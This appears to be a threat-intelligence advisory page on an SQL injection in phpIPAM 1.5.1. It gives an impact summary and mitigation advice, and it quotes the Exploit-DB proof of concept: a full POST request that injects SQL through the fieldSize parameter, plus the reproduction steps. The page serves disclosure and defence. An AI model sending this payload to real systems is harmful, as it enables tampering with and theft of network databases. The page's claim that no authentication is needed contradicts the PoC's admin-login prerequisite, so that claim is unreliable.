phpIPAM 1.5.1 - SQL Injection
phpIPAM 1.5.1 - SQL Injection
AI Analysis
Technical Summary
phpIPAM 1.5.1, an open-source IP address management application written in PHP, is affected by an SQL Injection vulnerability. This vulnerability arises from improper sanitization of user-supplied input in SQL queries, allowing attackers to inject malicious SQL code. Successful exploitation can lead to unauthorized retrieval, modification, or deletion of data stored in the backend database, which typically contains critical network information such as IP addresses, subnets, and device details. The exploit code has been published on Exploit-DB (ID 52444), indicating that the vulnerability is known and potentially exploitable in the wild, although no confirmed active exploitation has been reported yet. The lack of authentication or user interaction requirements in the provided information suggests that the attack surface may be broad, especially if the phpIPAM instance is exposed to untrusted networks. The absence of official patches or CVSS scoring complicates risk assessment but underscores the urgency for organizations to audit their phpIPAM installations. Given phpIPAM's role in network management, exploitation could disrupt network operations and compromise sensitive infrastructure data.
Potential Impact
For European organizations, exploitation of this SQL Injection vulnerability in phpIPAM 1.5.1 could result in significant confidentiality breaches, exposing sensitive network topology and IP allocation data. Integrity of network management data could be compromised, leading to incorrect IP assignments or network misconfigurations, potentially causing service disruptions. Availability might also be affected if attackers manipulate or delete critical database records. Organizations in sectors with stringent data protection requirements, such as finance, healthcare, and government, face increased regulatory and operational risks. The presence of publicly available exploit code raises the likelihood of attacks, especially against externally accessible phpIPAM instances. The medium severity rating reflects a balance between the potential impact and the current lack of evidence for widespread exploitation.
Mitigation Recommendations
European organizations should immediately inventory all phpIPAM 1.5.1 deployments and restrict access to trusted internal networks only, employing network segmentation and firewall rules to limit exposure. Since no official patch is currently available, consider upgrading to a later, patched version of phpIPAM if available, or apply community-recommended workarounds such as input validation and prepared statements to mitigate SQL Injection risks. Conduct thorough code reviews and penetration testing focused on SQL Injection vectors within phpIPAM. Implement web application firewalls (WAFs) with SQL Injection detection and prevention capabilities to block malicious requests. Regularly monitor logs for suspicious database query patterns and unauthorized access attempts. Educate IT staff on the risks and signs of SQL Injection exploitation. Finally, maintain regular backups of phpIPAM databases to enable recovery in case of data tampering or loss.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Indicators of Compromise
- exploit-code: # Exploit Title: phpIPAM 1.5.1 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2023-1211 Proof Of Concept POST /app/admin/custom-fields/edit-result.php HTTP/1.1 Host: phpipam Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token> Content-Type: application/x-www-form-urlencoded csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES **Prerequisites:** 1. Valid authenticated session (PHPSESSID cookie) 2. Valid CSRF token (obtain from `/admin/custom-fields/` page first) 3. Target table must exist (default 'devices' table used) 4. Field type must be enum/set to reach vulnerable code path **Manual Test Steps:** 1. Login to phpIPAM 2. Visit `/admin/custom-fields/` to get CSRF token 3. Send POST request with above payload **Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context. Steps to Reproduce Login as an admin user. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token. Observe the result
phpIPAM 1.5.1 - SQL Injection
Description
phpIPAM 1.5.1 - SQL Injection
AI-Powered Analysis
Technical Analysis
phpIPAM 1.5.1, an open-source IP address management application written in PHP, is affected by an SQL Injection vulnerability. This vulnerability arises from improper sanitization of user-supplied input in SQL queries, allowing attackers to inject malicious SQL code. Successful exploitation can lead to unauthorized retrieval, modification, or deletion of data stored in the backend database, which typically contains critical network information such as IP addresses, subnets, and device details. The exploit code has been published on Exploit-DB (ID 52444), indicating that the vulnerability is known and potentially exploitable in the wild, although no confirmed active exploitation has been reported yet. The lack of authentication or user interaction requirements in the provided information suggests that the attack surface may be broad, especially if the phpIPAM instance is exposed to untrusted networks. The absence of official patches or CVSS scoring complicates risk assessment but underscores the urgency for organizations to audit their phpIPAM installations. Given phpIPAM's role in network management, exploitation could disrupt network operations and compromise sensitive infrastructure data.
Potential Impact
For European organizations, exploitation of this SQL Injection vulnerability in phpIPAM 1.5.1 could result in significant confidentiality breaches, exposing sensitive network topology and IP allocation data. Integrity of network management data could be compromised, leading to incorrect IP assignments or network misconfigurations, potentially causing service disruptions. Availability might also be affected if attackers manipulate or delete critical database records. Organizations in sectors with stringent data protection requirements, such as finance, healthcare, and government, face increased regulatory and operational risks. The presence of publicly available exploit code raises the likelihood of attacks, especially against externally accessible phpIPAM instances. The medium severity rating reflects a balance between the potential impact and the current lack of evidence for widespread exploitation.
Mitigation Recommendations
European organizations should immediately inventory all phpIPAM 1.5.1 deployments and restrict access to trusted internal networks only, employing network segmentation and firewall rules to limit exposure. Since no official patch is currently available, consider upgrading to a later, patched version of phpIPAM if available, or apply community-recommended workarounds such as input validation and prepared statements to mitigate SQL Injection risks. Conduct thorough code reviews and penetration testing focused on SQL Injection vectors within phpIPAM. Implement web application firewalls (WAFs) with SQL Injection detection and prevention capabilities to block malicious requests. Regularly monitor logs for suspicious database query patterns and unauthorized access attempts. Educate IT staff on the risks and signs of SQL Injection exploitation. Finally, maintain regular backups of phpIPAM databases to enable recovery in case of data tampering or loss.
Affected Countries
Technical Details
- Edb Id
- 52444
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for phpIPAM 1.5.1 - SQL Injection
# Exploit Title: phpIPAM 1.5.1 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2023-1211 Proof Of Concept POST /app/admin/custom-fields/edit-result.php HTTP/1.1 Host: phpipam Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token> Content-Type: application/x-www-form-urlencoded csrf_cookie=<valid_csrf_token... (920 more characters)
Threat ID: 692f27653286267b25e73ff1
Added to database: 12/2/2025, 5:52:37 PM
Last enriched: 12/23/2025, 11:23:11 PM
Last updated: 1/19/2026, 9:39:58 AM
Views: 58
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations
LowSiklu EtherHaul Series EH-8010 - Remote Command Execution
MediumSiklu EtherHaul Series EH-8010 - Arbitrary File Upload
MediumRPi-Jukebox-RFID 2.8.0 - Remote Command Execution
MediumFive Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.